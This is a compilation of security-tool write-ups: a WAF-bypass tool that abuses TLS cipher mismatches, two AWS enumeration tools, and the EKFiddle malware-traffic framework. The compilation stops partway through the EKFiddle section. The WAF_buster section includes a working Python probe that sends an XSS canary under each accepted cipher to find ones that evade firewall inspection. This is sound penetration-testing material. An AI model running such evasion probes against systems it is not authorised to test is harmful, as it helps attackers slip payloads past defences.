WAF Buster – Disrupt WAF By Abusing SSL/TLS Ciphers

Disrupt WAF by abusing SSL/TLS Ciphers

About WAF_buster

This tool was created to analyze the ciphers that are supported by the web application firewall sitting in front of the web server. (Reference: https://0x09al.github.io/waf/bypass/ssl/2018/07/02/web-application-firewall-bypass.html)

It works by first running SSLScan to collect every cipher the target accepts during the SSL/TLS negotiation. With that text file of supported ciphers in hand, it then uses curl to request the target with each cipher in turn, looking for ciphers that the web server supports but the WAF does not. If such a cipher is found, the message "Firewall is bypassed" is displayed. The premise is that a WAF which cannot negotiate a given cipher suite cannot decrypt and inspect the traffic carried under it, so a cipher the origin accepts but the WAF does not is a path around inspection.

Installation

    git clone https://github.com/viperbluff/WAF_buster.git

Python2

This tool was created using Python2 and the following modules are used throughout:
1. requests
2. os
3. sys
4. subprocess

Usage

Open a terminal and run:

    python2 WAF_buster.py --input

Download WAF_buster
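The enumerate-then-probe loop described above, as an added example that is not WAF_buster's own code. Step 1 parses the cipher table that sslscan prints; step 2 sends one request per cipher with curl, forcing that single cipher through --ciphers (curl takes OpenSSL cipher names, which is what sslscan prints) and carrying a request the WAF is expected to block. A cipher with which the handshake succeeds and the request is still not blocked is one the server negotiates but the WAF does not inspect. The target URL, the canary request, the "HTTP 403 means blocked" rule and the sample sslscan output are all constructed for this example; the probe is injectable so the classification can be exercised offline.

```python
"""Added example, not WAF_buster's own code: parse sslscan output, probe each
accepted cipher with curl, and bucket the results.

Assumptions (constructed for this example): the target URL, the canary path,
the set of HTTP statuses taken to mean "the WAF blocked it", and the sample
sslscan output.  curl_probe() is the only part that touches the network.
"""
import re
import subprocess
from typing import Callable, Dict, List, Tuple

# Constructed sample in the layout of sslscan's "Supported Server Cipher(s)" table.
SAMPLE_SSLSCAN_OUTPUT = """\
  Supported Server Cipher(s):
Preferred TLSv1.2  256 bits  ECDHE-RSA-AES256-GCM-SHA384   Curve P-256 DHE 256
Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-GCM-SHA256   Curve P-256 DHE 256
Accepted  TLSv1.2  256 bits  AES256-SHA256
Accepted  TLSv1.1  256 bits  AES256-SHA
Rejected  TLSv1.0  128 bits  RC4-SHA
"""

CIPHER_ROW = re.compile(
    r"^\s*(Preferred|Accepted)\s+(TLSv1\.\d|SSLv\d)\s+\d+\s+bits\s+(\S+)", re.M)

# Constructed canary: a request a WAF that inspects the traffic is expected to block.
CANARY_PATH = "/?q=<script>alert(1)</script>"
BLOCKED_STATUSES = {"403", "406", "429"}   # assumption: these mean "blocked by the WAF"


def parse_sslscan(text: str) -> List[str]:
    """OpenSSL cipher names the server accepted; 'Rejected' rows are skipped."""
    return [m.group(3) for m in CIPHER_ROW.finditer(text)]


def curl_probe(url: str, cipher: str, timeout: int = 10) -> Tuple[int, str]:
    """Real probe.  Returns (curl exit status, HTTP status code or '000').
    curl exit 35 = TLS handshake failed, 28 = timed out.  For TLS 1.3 suites
    curl expects --tls13-ciphers instead of --ciphers."""
    cmd = ["curl", "-s", "-o", "/dev/null", "-w", "%{http_code}",
           "--max-time", str(timeout), "--ciphers", cipher, url + CANARY_PATH]
    proc = subprocess.run(cmd, capture_output=True, text=True)
    return proc.returncode, proc.stdout.strip()


def classify(exit_status: int, http_status: str) -> str:
    if exit_status != 0:
        return "handshake-failed"        # nothing in the path negotiates this cipher
    if http_status in BLOCKED_STATUSES:
        return "inspected"               # the WAF saw the canary and blocked it
    return "bypass-candidate"            # the origin answered, the WAF did not intervene


def bust(url: str, sslscan_text: str,
         probe: Callable[[str, str], Tuple[int, str]] = curl_probe) -> Dict[str, List[str]]:
    """Probe every accepted cipher and bucket the results by what happened."""
    buckets: Dict[str, List[str]] = {"handshake-failed": [], "inspected": [], "bypass-candidate": []}
    for cipher in parse_sslscan(sslscan_text):
        buckets[classify(*probe(url, cipher))].append(cipher)
    return buckets


if __name__ == "__main__":
    # Offline demo with a constructed probe standing in for curl.
    fake = {"ECDHE-RSA-AES256-GCM-SHA384": (0, "403"),
            "ECDHE-RSA-AES128-GCM-SHA256": (0, "403"),
            "AES256-SHA256": (0, "200"),
            "AES256-SHA": (35, "000")}
    result = bust("https://target.example", SAMPLE_SSLSCAN_OUTPUT, probe=lambda _url, c: fake[c])
    for bucket, ciphers in result.items():
        print(bucket, ciphers)
    if result["bypass-candidate"]:
        print("Firewall is bypassed with:", ", ".join(result["bypass-candidate"]))
```

The bucket to act on is "bypass-candidate": the handshake completed (so the origin supports the cipher) yet the canary that is blocked under the other ciphers went through. Confirm any candidate by hand before reporting it, since a 200 can also come from a WAF that only logs.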

Link: http://feedproxy.google.com/~r/PentestTools/~3/0fQO7UVapz0/waf-buster-disrupt-waf-by-abusing.html

Aws_Public_Ips – Fetch All Public IP Addresses Tied To Your AWS Account

aws_public_ips is a tool to fetch all public IP addresses (both IPv4/IPv6) associated with an AWS account.

It can be used as a library and as a CLI, and supports the following AWS services (all with both Classic & VPC flavors):
APIGateway
CloudFront
EC2 (and as a result: ECS, EKS, Beanstalk, Fargate, Batch, & NAT Instances)
ElasticSearch
ELB (Classic ELB)
ELBv2 (ALB/NLB)
Lightsail
RDS
Redshift

If a service isn't listed (S3, ElastiCache, etc.) it's most likely because it doesn't have anything to support (i.e. it might not be deployable publicly, it might have all IP addresses resolve to global AWS infrastructure, etc.).

Quick start

Install the gem and run it:

    $ gem install aws_public_ips

    # Uses default ~/.aws/credentials
    $ aws_public_ips
    52.84.11.13
    52.84.11.83
    2600:9000:2039:ba00:1a:cd27:1440:93a1
    2600:9000:2039:6e00:1a:cd27:1440:93a1

    # With a custom profile
    $ AWS_PROFILE=production aws_public_ips
    52.84.11.159

CLI reference

    $ aws_public_ips --help
    Usage: aws_public_ips [options]
        -s, --services <s1>,<s2>,<s3>    List of AWS services to check. Available services: apigateway,cloudfront,ec2,elasticsearch,elb,elbv2,lightsail,rds,redshift. Defaults to all.
        -f, --format <format>            Set output format. Available formats: json,prettyjson,text. Defaults to text.
        -v, --[no-]verbose               Enable debug/trace output
            --version                    Print version
        -h, --help                       Show this help message

Configuration

For authentication aws_public_ips uses the default aws-sdk-ruby configuration, meaning that the following are checked in order:

Environment variables:
    AWS_ACCESS_KEY_ID
    AWS_SECRET_ACCESS_KEY
    AWS_REGION
    AWS_PROFILE
Shared credentials files:
    ~/.aws/credentials
    ~/.aws/config
Instance profile via metadata endpoint (if running on EC2, ECS, EKS, or Fargate)

For more information see the AWS SDK documentation on configuration.

IAM permissions

To find the public IPs from all AWS services, the minimal policy needed by your IAM user is:

    {
      "Version": "2012-10-17",
      "Statement": [
        {
          "Effect": "Allow",
          "Action": [
            "apigateway:GET",
            "cloudfront:ListDistributions",
            "ec2:DescribeInstances",
            "elasticloadbalancing:DescribeLoadBalancers",
            "lightsail:GetInstances",
            "lightsail:GetLoadBalancers",
            "rds:DescribeDBInstances",
            "redshift:DescribeClusters"
          ],
          "Resource": "*"
        }
      ]
    }

Contact

Feel free to tweet or direct message: @arkadiyt

Download Aws_Public_Ips
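The extraction step for three of the listed services, as an added example in Python; this is not aws_public_ips' own (Ruby) code. It shows the two shapes the tool has to deal with: EC2 carries addresses directly in the DescribeInstances response (PublicIpAddress, the ENI association, and IPv6 addresses, which on EC2 are always globally routable), whereas CloudFront distributions and load balancers only expose a DNS name that has to be resolved to get IPs. The response dicts, the fake resolver and the IP/DNS names below are constructed for the example; collect_live() is the only part that talks to AWS and needs boto3.

```python
"""Added example, not aws_public_ips' own code: pull public IPs out of the
EC2, CloudFront and ELBv2 API responses, resolving DNS names where needed.

Assumptions (constructed): the sample responses, fake_resolver's table, and
the host names and addresses they contain.
"""
import ipaddress
import socket
from typing import Callable, Optional, Set


def _is_public(addr: str) -> bool:
    """Keep only globally routable addresses (drops RFC1918, CGNAT, link-local, ULA)."""
    return ipaddress.ip_address(addr).is_global


def ec2_public_ips(describe_instances: dict) -> Set[str]:
    """Public IPv4/IPv6 from one ec2.describe_instances() response page."""
    ips: Set[str] = set()
    for reservation in describe_instances.get("Reservations", []):
        for inst in reservation.get("Instances", []):
            if inst.get("PublicIpAddress"):
                ips.add(inst["PublicIpAddress"])
            for eni in inst.get("NetworkInterfaces", []):
                public = eni.get("Association", {}).get("PublicIp")
                if public:
                    ips.add(public)
                for v6 in eni.get("Ipv6Addresses", []):
                    ips.add(v6["Ipv6Address"])
    return {ip for ip in ips if _is_public(ip)}


def resolve_all(hostname: str, resolver: Callable = socket.getaddrinfo) -> Set[str]:
    """Every A and AAAA record behind a name (one CloudFront name resolves to several)."""
    return {sockaddr[0] for *_, sockaddr in resolver(hostname, None)}


def cloudfront_public_ips(list_distributions: dict, resolver: Callable = socket.getaddrinfo) -> Set[str]:
    ips: Set[str] = set()
    for dist in list_distributions.get("DistributionList", {}).get("Items", []):
        ips |= resolve_all(dist["DomainName"], resolver)
    return ips


def elbv2_public_ips(describe_load_balancers: dict, resolver: Callable = socket.getaddrinfo) -> Set[str]:
    ips: Set[str] = set()
    for lb in describe_load_balancers.get("LoadBalancers", []):
        if lb.get("Scheme") == "internet-facing":   # internal ALB/NLB names resolve to private IPs
            ips |= resolve_all(lb["DNSName"], resolver)
    return ips


def collect_live(profile: Optional[str] = None) -> Set[str]:
    """Live run (needs boto3 and the IAM actions listed above).  EC2 and ELBv2 are
    regional, so every region is walked; CloudFront is global."""
    import boto3
    session = boto3.Session(profile_name=profile)
    ips = cloudfront_public_ips(session.client("cloudfront", region_name="us-east-1").list_distributions())
    for region in session.get_available_regions("ec2"):
        ec2 = session.client("ec2", region_name=region)
        for page in ec2.get_paginator("describe_instances").paginate():
            ips |= ec2_public_ips(page)
        elbv2 = session.client("elbv2", region_name=region)
        for page in elbv2.get_paginator("describe_load_balancers").paginate():
            ips |= elbv2_public_ips(page)
    return ips


# Constructed responses: one instance with a public IPv4, an ENI association and
# an IPv6 address, one instance with only a private address, one distribution,
# and one internet-facing plus one internal load balancer.
SAMPLE_DESCRIBE_INSTANCES = {"Reservations": [{"Instances": [
    {"InstanceId": "i-0constructed1", "PublicIpAddress": "52.84.11.13", "PrivateIpAddress": "10.0.1.5",
     "NetworkInterfaces": [{"Association": {"PublicIp": "52.84.11.13"},
                            "Ipv6Addresses": [{"Ipv6Address": "2600:9000:2039:ba00:1a:cd27:1440:93a1"}]}]},
    {"InstanceId": "i-0constructed2", "PrivateIpAddress": "10.0.1.6", "NetworkInterfaces": []},
]}]}
SAMPLE_LIST_DISTRIBUTIONS = {"DistributionList": {"Items": [{"DomainName": "d111111abcdef8.cloudfront.net"}]}}
SAMPLE_DESCRIBE_LBS = {"LoadBalancers": [
    {"DNSName": "public-alb-123.eu-west-1.elb.amazonaws.com", "Scheme": "internet-facing"},
    {"DNSName": "internal-alb-456.eu-west-1.elb.amazonaws.com", "Scheme": "internal"},
]}


def fake_resolver(hostname: str, port) -> list:
    """Constructed stand-in for socket.getaddrinfo so the example runs offline."""
    table = {
        "d111111abcdef8.cloudfront.net": ["52.84.11.83", "2600:9000:2039:6e00:1a:cd27:1440:93a1"],
        "public-alb-123.eu-west-1.elb.amazonaws.com": ["52.84.11.159"],
        "internal-alb-456.eu-west-1.elb.amazonaws.com": ["10.0.2.10"],
    }
    return [(None, None, None, "", (ip, 0)) for ip in table[hostname]]


if __name__ == "__main__":
    found = (ec2_public_ips(SAMPLE_DESCRIBE_INSTANCES)
             | cloudfront_public_ips(SAMPLE_LIST_DISTRIBUTIONS, fake_resolver)
             | elbv2_public_ips(SAMPLE_DESCRIBE_LBS, fake_resolver))
    print("\n".join(sorted(found)))
```

Note that the IAM policy above grants only ec2:DescribeInstances, which is enough for this EC2 path; anything that starts from DNS names (CloudFront, ELB) additionally depends on the resolver seeing the same answers an attacker would, so run it from outside your VPC.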

Link: http://feedproxy.google.com/~r/PentestTools/~3/aLYdLNP_wx4/awspublicips-fetch-all-public-ip.html

Resource-Counter – This Command Line Tool Counts The Number Of Resources In Different Categories Across Amazon Regions

This command line tool counts the number of resources in different categories across Amazon regions.

This is a simple Python app that counts resources across different regions and displays them on the command line. It first shows the dictionary of results for the monitored services on a per-region basis, then it shows totals across all regions in a friendlier format. It tries to use the most efficient query mechanism for each resource in order to limit the impact of API activity. I wrote this to help me scope out assessments and know where resources are in a target account.

The development plan is to upgrade the output (probably to a CSV file) and to continue to add services. If you have a specific service you want to see added, just add a request in the comments.

The current list includes:
Application and Network Load Balancers
Autoscale Groups
Classic Load Balancers
CloudTrail Trails
Cloudwatch Rules
Config Rules
Dynamo Tables
Elastic IP Addresses
Glacier Vaults
IAM Groups
Images
Instances
KMS Keys
Lambda Functions
Launch Configurations
NAT Gateways
Network ACLs
IAM Policies
RDS Instances
IAM Roles
S3 Buckets
SAML Providers
SNS Topics
Security Groups
Snapshots
Subnets
IAM Users
VPC Endpoints
VPC Peering Connections
VPCs
Volumes

Usage:

To install, just copy it where you want it and install the requirements:

    pip install -r ./requirements.txt

This was written in Python 3.6.

To run:

    python count_resources.py

By default, it will use whatever AWS credentials are already configured on the system. You can also specify an access key/secret at runtime; these are not stored. It only needs read permissions for the listed services. I use the ReadOnlyAccess managed policy, but you should also be able to use the SecurityAudit policy.

    Usage: count_resources.py [OPTIONS]

    Options:
      --access TEXT   AWS Access Key. Otherwise will use the standard credentials path for the AWS CLI.
      --secret TEXT   AWS Secret Key
      --profile TEXT  If you have multiple credential profiles, use this option to specify one.
      --help          Show this message and exit.

Sample Output:

    Establishing AWS session using the profile- dev
    Current account ID: xxxxxxxxxx
    Counting resources across regions. This will take a few minutes...

    Resources by region
    {'ap-northeast-1': {'instances': 0, 'volumes': 0, 'security_groups': 1, 'snapshots': 0, 'images': 0, 'vpcs': 1, 'subnets': 3, 'peering connections': 0, 'network ACLs': 1, 'elastic IPs': 0, 'NAT gateways': 0, 'VPC Endpoints': 0, 'autoscale groups': 0, 'launch configurations': 0, 'classic load balancers': 0, 'application and network load balancers': 0, 'lambdas': 0, 'glacier vaults': 0, 'cloudwatch rules': 0, 'config rules': 0, 'cloudtrail trails': 1, 'sns topics': 0, 'kms keys': 0, 'dynamo tables': 0, 'rds instances': 0},
     'ap-northeast-2': {'instances': 0, 'volumes': 0, 'security_groups': 1, 'snapshots': 0, 'images': 0, 'vpcs': 1, 'subnets': 2, 'peering connections': 0, 'network ACLs': 1, 'elastic IPs': 0, 'NAT gateways': 0, 'VPC Endpoints': 0, 'autoscale groups': 0, 'launch configurations': 0, 'classic load balancers': 0, 'application and network load balancers': 0, 'lambdas': 0, 'glacier vaults': 0, 'cloudwatch rules': 0, 'config rules': 0, 'cloudtrail trails': 1, 'sns topics': 0, 'kms keys': 0, 'dynamo tables': 0, 'rds instances': 0},
     'ap-south-1': {'instances': 0, 'volumes': 0, 'security_groups': 1, 'snapshots': 0, 'images': 0, 'vpcs': 1, 'subnets': 2, 'peering connections': 0, 'network ACLs': 1, 'elastic IPs': 0, 'NAT gateways': 0, 'VPC Endpoints': 0, 'autoscale groups': 0, 'launch configurations': 0, 'classic load balancers': 0, 'application and network load balancers': 0, 'lambdas': 0, 'glacier vaults': 0, 'cloudwatch rules': 0, 'config rules': 0, 'cloudtrail trails': 1, 'sns topics': 0, 'kms keys': 0, 'dynamo tables': 0, 'rds instances': 0},
     'ap-southeast-1': {'instances': 0, 'volumes': 0, 'security_groups': 1, 'snapshots': 0, 'images': 0, 'vpcs': 1, 'subnets': 3, 'peering connections': 0, 'network ACLs': 1, 'elastic IPs': 0, 'NAT gateways': 0, 'VPC Endpoints': 0, 'autoscale groups': 0, 'launch configurations': 0, 'classic load balancers': 0, 'application and network load balancers': 0, 'lambdas': 0, 'glacier vaults': 0, 'cloudwatch rules': 0, 'config rules': 0, 'cloudtrail trails': 1, 'sns topics': 0, 'kms keys': 0, 'dynamo tables': 0, 'rds instances': 0},
     'ap-southeast-2': {'instances': 0, 'volumes': 0, 'security_groups': 1, 'snapshots': 0, 'images': 0, 'vpcs': 1, 'subnets': 3, 'peering connections': 0, 'network ACLs': 1, 'elastic IPs': 0, 'NAT gateways': 0, 'VPC Endpoints': 0, 'autoscale groups': 0, 'launch configurations': 0, 'classic load balancers': 0, 'application and network load balancers': 0, 'lambdas': 0, 'glacier vaults': 0, 'cloudwatch rules': 0, 'config rules': 0, 'cloudtrail trails': 1, 'sns topics': 0, 'kms keys': 0, 'dynamo tables': 0, 'rds instances': 0},
     'ca-central-1': {'instances': 0, 'volumes': 0, 'security_groups': 1, 'snapshots': 0, 'images': 0, 'vpcs': 1, 'subnets': 2, 'peering connections': 0, 'network ACLs': 1, 'elastic IPs': 0, 'NAT gateways': 0, 'VPC Endpoints': 0, 'autoscale groups': 0, 'launch configurations': 0, 'classic load balancers': 0, 'application and network load balancers': 0, 'lambdas': 0, 'glacier vaults': 0, 'cloudwatch rules': 0, 'config rules': 0, 'cloudtrail trails': 1, 'sns topics': 0, 'kms keys': 0, 'dynamo tables': 0, 'rds instances': 0},
     'eu-central-1': {'instances': 0, 'volumes': 0, 'security_groups': 1, 'snapshots': 0, 'images': 0, 'vpcs': 1, 'subnets': 3, 'peering connections': 0, 'network ACLs': 1, 'elastic IPs': 0, 'NAT gateways': 0, 'VPC Endpoints': 0, 'autoscale groups': 0, 'launch configurations': 0, 'classic load balancers': 0, 'application and network load balancers': 0, 'lambdas': 0, 'glacier vaults': 0, 'cloudwatch rules': 0, 'config rules': 0, 'cloudtrail trails': 1, 'sns topics': 0, 'kms keys': 0, 'dynamo tables': 0, 'rds instances': 0},
     'eu-west-1': {'instances': 0, 'volumes': 0, 'security_groups': 1, 'snapshots': 0, 'images': 0, 'vpcs': 1, 'subnets': 3, 'peering connections': 0, 'network ACLs': 1, 'elastic IPs': 0, 'NAT gateways': 0, 'VPC Endpoints': 0, 'autoscale groups': 0, 'launch configurations': 0, 'classic load balancers': 0, 'application and network load balancers': 0, 'lambdas': 0, 'glacier vaults': 0, 'cloudwatch rules': 0, 'config rules': 0, 'cloudtrail trails': 1, 'sns topics': 0, 'kms keys': 0, 'dynamo tables': 0, 'rds instances': 0},
     'eu-west-2': {'instances': 3, 'volumes': 3, 'security_groups': 1, 'snapshots': 0, 'images': 0, 'vpcs': 1, 'subnets': 3, 'peering connections': 0, 'network ACLs': 1, 'elastic IPs': 0, 'NAT gateways': 0, 'VPC Endpoints': 0, 'autoscale groups': 0, 'launch configurations': 0, 'classic load balancers': 0, 'application and network load balancers': 0, 'lambdas': 0, 'glacier vaults': 0, 'cloudwatch rules': 0, 'config rules': 0, 'cloudtrail trails': 1, 'sns topics': 0, 'kms keys': 0, 'dynamo tables': 0, 'rds instances': 0},
     'eu-west-3': {'instances': 0, 'volumes': 0, 'security_groups': 1, 'snapshots': 0, 'images': 0, 'vpcs': 1, 'subnets': 3, 'peering connections': 0, 'network ACLs': 1, 'elastic IPs': 0, 'NAT gateways': 0, 'VPC Endpoints': 0, 'autoscale groups': 0, 'launch configurations': 0, 'classic load balancers': 0, 'application and network load balancers': 0, 'lambdas': 0, 'glacier vaults': 0, 'cloudwatch rules': 0, 'config rules': 0, 'cloudtrail trails': 1, 'sns topics': 0, 'kms keys': 0, 'dynamo tables': 0, 'rds instances': 0},
     'sa-east-1': {'instances': 0, 'volumes': 0, 'security_groups': 1, 'snapshots': 0, 'images': 0, 'vpcs': 1, 'subnets': 3, 'peering connections': 0, 'network ACLs': 1, 'elastic IPs': 0, 'NAT gateways': 0, 'VPC Endpoints': 0, 'autoscale groups': 0, 'launch configurations': 0, 'classic load balancers': 0, 'application and network load balancers': 0, 'lambdas': 0, 'cloudwatch rules': 0, 'config rules': 0, 'cloudtrail trails': 1, 'sns topics': 0, 'kms keys': 0, 'dynamo tables': 0, 'rds instances': 0},
     'us-east-1': {'instances': 2, 'volumes': 2, 'security_groups': 19, 'snapshots': 0, 'images': 0, 'vpcs': 2, 'subnets': 3, 'peering connections': 0, 'network ACLs': 2, 'elastic IPs': 0, 'NAT gateways': 0, 'VPC Endpoints': 0, 'autoscale groups': 0, 'launch configurations': 0, 'classic load balancers': 0, 'application and network load balancers': 0, 'lambdas': 0, 'glacier vaults': 0, 'cloudwatch rules': 0, 'config rules': 1, 'cloudtrail trails': 2, 'sns topics': 3, 'kms keys': 5, 'dynamo tables': 0, 'rds instances': 0},
     'us-east-2': {'instances': 0, 'volumes': 0, 'security_groups': 2, 'snapshots': 0, 'images': 0, 'vpcs': 1, 'subnets': 3, 'peering connections': 0, 'network ACLs': 1, 'elastic IPs': 0, 'NAT gateways': 0, 'VPC Endpoints': 0, 'autoscale groups': 0, 'launch configurations': 0, 'classic load balancers': 0, 'application and network load balancers': 0, 'lambdas': 0, 'glacier vaults': 0, 'cloudwatch rules': 0, 'config rules': 0, 'cloudtrail trails': 1, 'sns topics': 0, 'kms keys': 0, 'dynamo tables': 0, 'rds instances': 0},
     'us-west-1': {'instances': 1, 'volumes': 3, 'security_groups': 14, 'snapshots': 1, 'images': 0, 'vpcs': 0, 'subnets': 0, 'peering connections': 0, 'network ACLs': 0, 'elastic IPs': 0, 'NAT gateways': 0, 'VPC Endpoints': 0, 'autoscale groups': 0, 'launch configurations': 0, 'classic load balancers': 0, 'application and network load balancers': 0, 'lambdas': 0, 'glacier vaults': 0, 'cloudwatch rules': 0, 'config rules': 0, 'cloudtrail trails': 1, 'sns topics': 0, 'kms keys': 1, 'dynamo tables': 0, 'rds instances': 0},
     'us-west-2': {'instances': 9, 'volumes': 29, 'security_groups': 76, 'snapshots': 171, 'images': 104, 'vpcs': 7, 'subnets': 15, 'peering connections': 1, 'network ACLs': 8, 'elastic IPs': 7, 'NAT gateways': 1, 'VPC Endpoints': 0, 'autoscale groups': 1, 'launch configurations': 66, 'classic load balancers': 1, 'application and network load balancers': 2, 'lambdas': 10, 'glacier vaults': 1, 'cloudwatch rules': 8, 'config rules': 1, 'cloudtrail trails': 1, 'sns topics': 6, 'kms keys': 7, 'dynamo tables': 1, 'rds instances': 0}}

    Resource totals across all regions
    Application and Network Load Balancers : 2
    Autoscale Groups : 1
    Classic Load Balancers : 1
    CloudTrail Trails : 16
    Cloudwatch Rules : 8
    Config Rules : 2
    Dynamo Tables : 1
    Elastic IP Addresses : 7
    Glacier Vaults : 1
    Groups : 12
    Images : 104
    Instances : 15
    KMS Keys : 13
    Lambda Functions : 10
    Launch Configurations : 66
    NAT Gateways : 1
    Network ACLs : 22
    Policies : 15
    RDS Instances : 0
    Roles : 40
    S3 Buckets : 31
    SAML Providers : 1
    SNS Topics : 9
    Security Groups : 122
    Snapshots : 172
    Subnets : 51
    Users : 14
    VPC Endpoints : 0
    VPC Peering Connections : 1
    VPCs : 21
    Volumes : 37
    Total resources: 796

Download Resource-Counter
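The per-region counting loop, as an added example that is not resource-counter's own code. It uses boto3 paginators where the service offers one (the "most efficient query mechanism" the description mentions) and falls back to a single call otherwise, and it carries the two owner filters that decide whether an EC2 count is the account's own inventory or the public catalogue: describe_images without Owners=['self'] lists every public AMI, and describe_snapshots without OwnerIds=['self'] every public snapshot. The operation table, the FakeClient, the cached factory and the sample pages are constructed for the example; live_client_factory() is the only part that talks to AWS.

```python
"""Added example, not resource-counter's own code: count a few resource
types across regions with boto3 paginators and owner filters.

Assumptions (constructed): the COUNTERS table, FakeClient, sample_factory and
SAMPLE_PAGES exist only for this example.
"""
from typing import Callable, Dict, List, Sequence, Tuple

# (service, API operation, path to the items inside a response page, extra kwargs)
COUNTERS: List[Tuple[str, str, Sequence[str], dict]] = [
    ("ec2", "describe_instances", ("Reservations", "Instances"), {}),
    ("ec2", "describe_volumes", ("Volumes",), {}),
    ("ec2", "describe_snapshots", ("Snapshots",), {"OwnerIds": ["self"]}),   # else: every public snapshot
    ("ec2", "describe_images", ("Images",), {"Owners": ["self"]}),          # else: every public AMI
    ("ec2", "describe_security_groups", ("SecurityGroups",), {}),
    ("lambda", "list_functions", ("Functions",), {}),
]


def _count(obj: dict, path: Sequence[str]) -> int:
    """Count the leaves under a nested list path, e.g. Reservations[].Instances[]."""
    if not path:
        return 1
    return sum(_count(item, path[1:]) for item in obj.get(path[0], []))


def count_in_region(client_factory: Callable[[str, str], object], region: str) -> Dict[str, int]:
    counts: Dict[str, int] = {}
    for service, op, path, kwargs in COUNTERS:
        client = client_factory(service, region)
        if client.can_paginate(op):          # one paginated walk instead of a hand-rolled NextToken loop
            pages = client.get_paginator(op).paginate(**kwargs)
        else:
            pages = [getattr(client, op)(**kwargs)]
        counts[op] = sum(_count(page, path) for page in pages)
    return counts


def count_all(client_factory, regions) -> Tuple[Dict[str, Dict[str, int]], Dict[str, int]]:
    per_region = {region: count_in_region(client_factory, region) for region in regions}
    totals: Dict[str, int] = {}
    for counts in per_region.values():
        for op, n in counts.items():
            totals[op] = totals.get(op, 0) + n
    return per_region, totals


def live_client_factory(profile=None):
    """Live run: needs boto3 and read permissions (ReadOnlyAccess or SecurityAudit)."""
    import boto3
    session = boto3.Session(profile_name=profile)
    return (lambda service, region: session.client(service, region_name=region),
            session.get_available_regions("ec2"))


class FakeClient:
    """Constructed stand-in for a boto3 client: serves canned pages and records the kwargs it got."""
    def __init__(self, pages: Dict[str, List[dict]]):
        self.pages, self.calls = pages, {}

    def can_paginate(self, op: str) -> bool:
        return True

    def get_paginator(self, op: str):
        fake = self

        class _Paginator:
            def paginate(self, **kwargs):
                fake.calls[op] = kwargs
                return fake.pages.get(op, [{}])
        return _Paginator()


# Constructed pages: two regions; us-east-1 owns one AMI and three instances over two pages.
SAMPLE_PAGES = {
    "us-east-1": {
        "describe_instances": [{"Reservations": [{"Instances": [{}, {}]}]}, {"Reservations": [{"Instances": [{}]}]}],
        "describe_images": [{"Images": [{"ImageId": "ami-0constructed"}]}],
        "describe_security_groups": [{"SecurityGroups": [{}, {}, {}]}],
    },
    "eu-west-2": {"describe_volumes": [{"Volumes": [{}, {}, {}]}]},
}
_CACHE: Dict[Tuple[str, str], FakeClient] = {}


def sample_factory(service: str, region: str) -> FakeClient:
    """One FakeClient per (service, region), like a cached boto3 client."""
    return _CACHE.setdefault((service, region), FakeClient(SAMPLE_PAGES.get(region, {})))


if __name__ == "__main__":
    per_region, totals = count_all(sample_factory, ["us-east-1", "eu-west-2"])
    print("Resources by region", per_region)
    print("Resource totals across all regions", totals)
    print("Total resources:", sum(totals.values()))
```

If you swap in live_client_factory(), expect the run to take a few minutes, as the sample output says: each counter is one API walk per region, and a paginated DescribeSnapshots on an account with hundreds of snapshots is several calls by itself.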

Link: http://feedproxy.google.com/~r/PentestTools/~3/0QCDjS_vnjY/resource-counter-this-command-line-tool.html

EKFiddle – A Framework Based On The Fiddler Web Debugger To Study Exploit Kits, Malvertising And Malicious Traffic In General

A framework based on the Fiddler web debugger to study Exploit Kits, malvertising and malicious traffic in general.

Installation

Download and install the latest version of Fiddler:
https://www.telerik.com/fiddler

Special instructions for Linux and Mac here:
https://www.telerik.com/blogs/fiddler-for-linux-beta-is-here
https://www.telerik.com/blogs/introducing-fiddler-for-os-x-beta-1

Enable C# scripting (Windows only)
Launch Fiddler, and go to Tools -> Options. In the Scripting tab, change the default (JScript.NET) to C#.

Change default text editor (optional)
In the same Tools -> Options menu, click on the Tools tab.
Windows: notepad.exe or not epad++.exe
Linux: gedit
Mac: /Applications/TextEdit.app or /Applications/TextWrangler.app

Close Fiddler

Download or clone CustomRules.cs into the appropriate folder based on your operating system:
Windows (7/10)  C:\Users\[username]\Documents\Fiddler2\Scripts\
Ubuntu          /home/[username]/Fiddler2/Scripts/
Mac             /Users/[username]/Fiddler2/Scripts/

Finish up the installation
Start Fiddler to complete the installation of EKFiddle. That's it, you're all set!

Features

Toolbar buttons
The added toolbar buttons give you quick shortcuts to some of the main features:

QuickSave
Dumps current web sessions into a SAZ named QuickSave-"MM-dd-yyyy-HH-mm-ss".saz in EKFiddle\Captures.

UI mode
Toggle between the default column view or extra columns with additional information (includes time stamp, server IP and type, method, etc.).

VPN
VPN GUI directly built into Fiddler. It uses the OpenVPN client on Windows and Linux with .ovpn files (signing up with a commercial VPN provider may be required). It will open up a new terminal/xterm whenever it connects to a new server via the selected .ovpn config file, killing the previous one to ensure only one TAP adapter is used at any given time.
Windows: Download and install OpenVPN in the default directory. Place your .ovpn files inside OpenVPN's config folder.
Linux (tested on Ubuntu 16.04): sudo apt-get install openvpn. Place your .ovpn files in /etc/openvpn.

Proxy
Allows you to connect to an upstream proxy (HTTP/s or SOCKS).

Import SAZ/PCAP
A shortcut to load SAZ (Fiddler's native format) or PCAP (i.e. from Wireshark) captures.

View/Edit Regexes
View and create your custom regular expressions. Note: a master list is provided with auto-updates via GitHub. Additionally the custom list lets you create your own rules.

Run Regexes
Run the master and custom regular expressions against current web sessions.

Clear Markings
Clear any comment and colour highlighting in the currently loaded sessions.

ContextAction menu
The ContextAction menu (accessed by right-clicking on any session(s)) allows you to perform additional commands on selected sessions. This can be very helpful to do quick lookups, compute hashes or extract IOCs.

Hostname or IP address (Google Search, RiskIQ, URLQuery)
Query the hostname for the currently selected session.

URI
Build Regex: Create a regular expression from the currently selected URI. This action opens up a regex website and the URI is already in the clipboard, ready to be pasted into the query field.
Open in... Internet Explorer, Chrome, Firefox, Edge: This opens up the URI with the browser you selected.

Response Body
Remove encoding: Decodes the currently selected sessions (from their basic encoding).
Build Regex: Create a regular expression from the currently selected session's source code. This action opens up a regex website and the URI is already in the clipboard, ready to be pasted into the query field.
Calculate MD5/SHA256 hash: Gets the current session's body and computes its hash.
Hybrid Analysis / VirusTotal lookup: Hashes the current session's body, then looks up that hash.
Extract to Disk: Downloads the currently selected session(s)' body to disk, into the 'Artifacts' folder.
Extract IOCs: Copies into memory basic information from selected sessions so that they can be shared as IOCs.

Connect-the-dots
